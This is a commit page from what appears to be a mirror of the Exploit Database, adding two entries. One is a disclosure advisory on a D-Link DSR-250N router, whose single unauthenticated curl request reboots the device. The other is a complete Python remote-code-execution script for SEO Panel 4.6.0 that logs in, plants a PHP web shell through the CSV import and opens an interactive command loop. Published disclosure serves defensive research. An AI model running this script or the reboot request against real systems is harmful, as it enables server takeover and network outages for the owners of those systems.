bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-10-09

Browse source 
2 changes to exploits/shellcodes

SEO Panel 4.6.0 - Remote Code Execution
D-Link DSR-250N 3.12 - Denial of Service (PoC)
This commit is contained in:
Offensive Security 2020-10-09 05:02:05 +00:00
parent 1fbf4d267e
commit b45931e440
3 changed files with 220 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

157
exploits/hardware/webapps/48863.txt Normal file
View file

@ -0,0 +1,157 @@
# Exploit Title: D-Link DSR-250N 3.12 - Denial of Service (PoC)
# Google Dork: N/A
# Author: RedTeam Pentesting GmbH
# Date: 2020-10-03
# Exploit Author: Kiko Andreu (kikoas1995) & Daniel Monzón (stark0de)
# Vendor Homepage: https://www.dlink.com
# Software Link: https://www.dlink.com/en/products/dsr-250n-wireless-n-unified-service-router
# Version: 3.17B
# CVE : CVE-2020-26567
Advisory: Denial of Service in D-Link DSR-250N
RedTeam Pentesting discovered a Denial-of-Service vulnerability in the
D-Link DSR-250N device which allows unauthenticated attackers in the
same local network to execute a CGI script which reboots the device.
Details
=======
Product: D-Link DSR-250N
Affected Versions: 3.12 and potentially later
Fixed Versions: 3.17B
Vulnerability Type: DoS
Security Risk: low
Vendor URL: https://www.dlink.com/en/products/dsr-250n-wireless-n-unified-service-router
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-002
Advisory Status: published
CVE: CVE-2020-26567
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26567
Introduction
============
"The D-Link Wireless N Unified Service Router (DSR-250N) provides
enhanced security, functionality and performance over a traditional VPN
router without the complexity of a full firewall solution. The D-Link
Wireless N Unified Service Router is a cost-effective, high performance
solution for securing a small business network."
(from the vendor's homepage)
More Details
============
During a penetration test, the firmware for the D-Link DSR-250N router
was downloaded from D-Links official website[1] and extracted for
further analysis. It was then confirmed that CGI scripts exist on the
router that can be directly accessed with a web browser, without any
authentication. In particular, the script "upgradeStatusReboot.cgi"
executes the command to reboot the device. Its contents are:
------------------------------------------------------------------------
#!/bin/sh
echo Content-type: text/plain
echo ""
stat=`/sbin/reboot -d 8 &`
echo $stat
------------------------------------------------------------------------
Executing this script renders the device unusable for the time of the
reboot. In tests, it turned out that the device needs roughly four
minutes to complete a reboot. As a consequence, any network using the
device as a switch or router is not accessible during that time, too.
In the penetration test, the router's web interface was available
directly over the Internet. According to the vendor, the web interface
is by default disabled for the WAN interface.
Proof of Concept
================
An HTTP GET request to the CGI script "upgradeStatusReboot.cgi" will
reboot the device:
------------------------------------------------------------------------
$ curl -k -s https://IP-ADDRESS/scgi-bin/upgradeStatusReboot.cgi
------------------------------------------------------------------------
Workaround
==========
Access to the D-Link DSR-250N's web interface should only be enabled for
administrators, for example by only allowing access from specific IP
addresses in the firewall. Access over the WAN interface should also be
disabled if it was enabled manually.
Fix
===
A preview firmware version named 3.17B which should correct the issue
was received at the end of September from the vendor. RedTeam Pentesting
was not able to verify the fix due to lack of access to a test device.
However, the formerly accessible CGI script is no longer part of the
firmware.
Security Risk
=============
No authentication is needed to excute the CGI script and thereby reboot
the device. Attackers might abuse this behaviour for targeted
denial-of-service-attacks against D-Link customers, since rebooting the
device interrupts access to networks relying on this device for routing
or switching purposes. However, the attack is only possible if the
attacker resides on the same network, and no further information can be
gathered or control over the devices be obtained. Therefore, the
vulnerability is rated as a low risk.
Timeline
========
2020-06-29 Vulnerability identified
2020-07-03 Customer approved disclosure to vendor
2020-07-03 Requested security contact from vendor via web formular
2020-07-03 Vendor replied with contact information
2020-07-07 Advisory provided to vendor
2020-09-28 Vendor provided fixed version to RedTeam Pentesting
2020-10-05 CVE ID requested
2020-10-06 CVE ID assigned
2020-10-08 Advisory released
References
==========
[1] https://support.dlink.com/ProductInfo.aspx?m=DSR-250N
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:

61
exploits/php/webapps/48862.py Executable file
View file

@ -0,0 +1,61 @@
# Exploit Title: SEO Panel 4.6.0 - Remote Code Execution
# Google Dork: N/A
# Date: 2020-10-03
# Exploit Author: Kiko Andreu (kikoas1995) & Daniel Monzón (stark0de)
# Vendor Homepage: https://seopanel.org/
# Software Link: https://www.seopanel.org/spdownload/4.6.0
# Version: 4.6.0
# Tested on: Kali Linux x64 5.4.0
# CVE : N/A
#!/usr/bin/python
import sys
import os
import requests
ip = sys.argv[1]
user = sys.argv[2]
pwd = sys.argv[3]
port = sys.argv[4]
proto = sys.argv[5]
if (len(sys.argv) < 6):
print "Usage: python " + sys.argv[0] + " <ip> + <webapp user> + <webapp pwd> + <webapp port> + <http/https>"
exit()
session = requests.session()
# Get to login page
burp0_url = proto + "://" + ip + ":" + port + "//login.php"
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
session.get(burp0_url, headers=burp0_headers, verify=False)
# Login with the provided credentials
burp0_url = proto + "://" + ip + ":" + port + "//login.php"
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": proto + "://" + ip + "//login.php", "Content-Type": "application/x-www-form-urlencoded", "DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
burp0_data = {"sec": "login", "red_referer": proto + "://" + ip + "/", "userName": user, "password": pwd, "login": ''}
session.post(burp0_url, headers=burp0_headers, data=burp0_data, verify=False)
# Upload the webshell
burp0_url = proto + "://" + ip + ":" + port + "//websites.php"
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": proto + "://" + ip + "//admin-panel.php", "Content-Type": "multipart/form-data; boundary=---------------------------193626971803013289998688514", "DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
burp0_data = "-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"sec\"\r\n\r\nimport\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"userid\"\r\n\r\n1\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"website_csv_file\"; filename=\"shell.php\"\r\nContent-Type: text/csv\r\n\r\n<?php system($_GET['c']); ?>\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"delimiter\"\r\n\r\n,\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"enclosure\"\r\n\r\n\"\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"escape\"\r\n\r\n\\\r\n-----------------------------193626971803013289998688514--\r\n"
session.post(burp0_url, headers=burp0_headers, data=burp0_data, verify=False)
exit = 0
first = 1
# Loop for remote code execution
while (exit == 0):
cmd = raw_input("> ")
burp0_url = proto + "://" + ip + ":" + port + "//tmp/shell.php?c=" + cmd
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
x = session.get(burp0_url, headers=burp0_headers, verify=False)
if (x.status_code == 200 and first == 1):
first = 0
print "[+] Shell uploaded successfully!"
print x.text
if (cmd == "exit"):
exit = 1

2
files_exploits.csv
View file

@ -40680,6 +40680,8 @@ id,file,description,date,author,type,platform,port
48857,exploits/hardware/webapps/48857.txt,"Karel IP Phone IP1211 Web Management Panel - Directory Traversal",2020-10-06,"berat isler",webapps,hardware, 48857,exploits/hardware/webapps/48857.txt,"Karel IP Phone IP1211 Web Management Panel - Directory Traversal",2020-10-06,"berat isler",webapps,hardware,
48858,exploits/json/webapps/48858.txt,"EasyPMS 1.0.0 - Authentication Bypass",2020-10-06,Jok3r,webapps,json, 48858,exploits/json/webapps/48858.txt,"EasyPMS 1.0.0 - Authentication Bypass",2020-10-06,Jok3r,webapps,json,
48861,exploits/php/webapps/48861.txt,"Textpattern CMS 4.6.2 - 'body' Persistent Cross-Site Scripting",2020-10-07,"Alperen Ergel",webapps,php, 48861,exploits/php/webapps/48861.txt,"Textpattern CMS 4.6.2 - 'body' Persistent Cross-Site Scripting",2020-10-07,"Alperen Ergel",webapps,php,
48862,exploits/php/webapps/48862.py,"SEO Panel 4.6.0 - Remote Code Execution",2020-10-08,"Kiko Andreu",webapps,php,
48863,exploits/hardware/webapps/48863.txt,"D-Link DSR-250N 3.12 - Denial of Service (PoC)",2020-10-08,"RedTeam Pentesting GmbH",webapps,hardware,
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple, 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php, 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php, 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,

Can't render this file because it is too large.